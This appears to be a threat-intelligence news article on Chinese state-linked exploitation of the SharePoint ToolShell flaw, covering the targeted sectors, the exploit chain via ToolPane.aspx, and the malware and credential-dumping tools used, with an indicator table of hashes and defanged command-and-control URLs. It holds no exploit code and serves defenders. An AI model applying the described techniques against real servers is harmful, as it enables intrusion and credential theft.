China-based threat actors have exploited the critical ToolShell vulnerability in Microsoft SharePoint servers to infiltrate networks across multiple continents, targeting government agencies and critical infrastructure in a suspected espionage campaign.
This vulnerability, identified as CVE-2025-53770, enables unauthenticated remote code execution and has been actively used since its disclosure in July 2025, despite Microsoft’s rapid patching efforts.
Security researchers from Symantec report that the attacks began shortly after patches were released, affecting organizations in the Middle East, Africa, South America, and beyond.
ToolShell stems from a deserialization of untrusted data issue in on-premises SharePoint servers, allowing attackers to execute arbitrary code without authentication.
It builds on earlier flaws like CVE-2025-49704 and CVE-2025-49706, which were demonstrated at the Pwn2Own Berlin event in May 2025.
The exploit chain typically involves an authentication bypass (CVE-2025-53771), where a crafted POST request to the ToolPane.aspx endpoint tricks the server into granting access, followed by injecting malicious payloads for code execution.
Microsoft confirmed exploitation by at least three Chinese-linked groups Budworm (Linen Typhoon), Sheathminer (Violet Typhoon), and Storm-2603 shortly after patching on July 21, 2025.
These actors have leveraged ToolShell for zero-day attacks, compromising file systems and enabling persistent access.
Targets And Attack Patterns
The campaign’s scope is broad, with confirmed breaches in a Middle Eastern telecom firm, two African government departments, South American agencies, a U.S. university, an African state technology entity, a Middle Eastern government department, and a European finance company.
Initial access in the Middle East occurred on July 21, 2025, via a webshell deployment, followed by DLL sideloading of malware using legitimate binaries from Trend Micro and BitDefender.
In South American cases, attackers exploited SQL and Apache HTTP servers with Adobe ColdFusion, using a renamed “mantec.exe” to mimic Symantec tools and sideload malicious DLLs.
Evidence points to mass scanning for vulnerable servers, with selective follow-up on high-value targets for credential theft and lateral movement.
The attackers deployed Zingdoor, a Go-based HTTP backdoor linked to the Glowworm group (aka Earth Estries or FamousSparrow), first documented in 2023 for espionage against government and tech sectors.
ShadowPad, a modular RAT associated with APT41-nexus groups like Blackfly, was also used via DLL sideloading for command execution and updates.
KrustyLoader, a Rust-written loader tied to UNC5221 (a China-nexus actor), delivered second-stage payloads like Sliver, an open-source C2 framework abused for red-team emulation.
Living-off-the-land tools included Certutil for downloads, Procdump and LsassDumper for credential dumping, GoGo Scanner for reconnaissance, Revsocks for proxying, and the PetitPotam exploit (CVE-2021-36942) for privilege escalation.
IoCs
This activity highlights ToolShell’s widespread abuse beyond initial reports, underscoring the need for urgent patching of on-premises SharePoint instances.
With over 400 compromises detected and links to Salt Typhoon tactics, the operations suggest state-sponsored espionage focused on persistent, stealthy network access.
| Type | Indicator | Description |
|---|---|---|
| SHA256 Hash | 6240e39475f04bfe55ab7cba8746bd08901d7678b1c7742334d56f2bc8620a35 | LsassDumper |
| SHA256 Hash | 929e3fdd3068057632b52ecdfd575ab389390c852b2f4e65dc32f20c87521600 | KrustyLoader |
| SHA256 Hash | db15923c814a4b00ddb79f9c72f8546a44302ac2c66c7cc89a144cb2c2bb40fa | Likely ShadowPad |
| SHA256 Hash | e6c216cec379f418179a3f6a79df54dcf6e6e269a3ce3479fd7e6d4a15ac066e | ShadowPad Loader |
| SHA256 Hash | 071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6 | Zingdoor |
| SHA256 Hash | 1f94ea00be79b1e4e8e0b7bbf2212f2373da1e13f92b4ca2e9e0ffc5f93e452b | PetitPotam/CVE-2021-36942 exploit |
| SHA256 Hash | dbdc1beeb5c72d7b505a9a6c31263fc900ea3330a59f08e574fd172f3596c1b8 | RevSocks |
| SHA256 Hash | 6aecf805f72c9f35dadda98177f11ca6a36e8e7e4348d72eaf1a80a899aa6566 | LsassDumper |
| SHA256 Hash | 568561d224ef29e5051233ab12d568242e95d911b08ce7f2c9bf2604255611a9 | Socks Proxy |
| SHA256 Hash | 28a859046a43fc8a7a7453075130dd649eb2d1dd0ebf0abae5d575438a25ece9 | GoGo Scanner |
| SHA256 Hash | 7be8e37bc61005599e4e6817eb2a3a4a5519fded76cb8bf11d7296787c754d40 | Sliver |
| SHA256 Hash | 5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61 | ProcDump |
| SHA256 Hash | e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc | ProcDump |
| SHA256 Hash | 7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1 | Minidump |
| SHA256 Hash | 7acf21677322ef2aa835b5836d3e4b8a6b78ae10aa29d6640885e933f83a4b01 | mantec.exe (Benign executable) |
| SHA256 Hash | 6c48a510642a1ba516dbc5effe3671524566b146e04d99ab7f4832f66b3f95aa | bugsplatrc.dll |
| URL | http://kia-almotores.s3.amazonaws[.]com/sy1cyjt | KrustyLoader C&C server |
| URL | http://omnileadzdev.s3.amazonaws[.]com/PBfbN58lX | KrustyLoader C&C server |
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
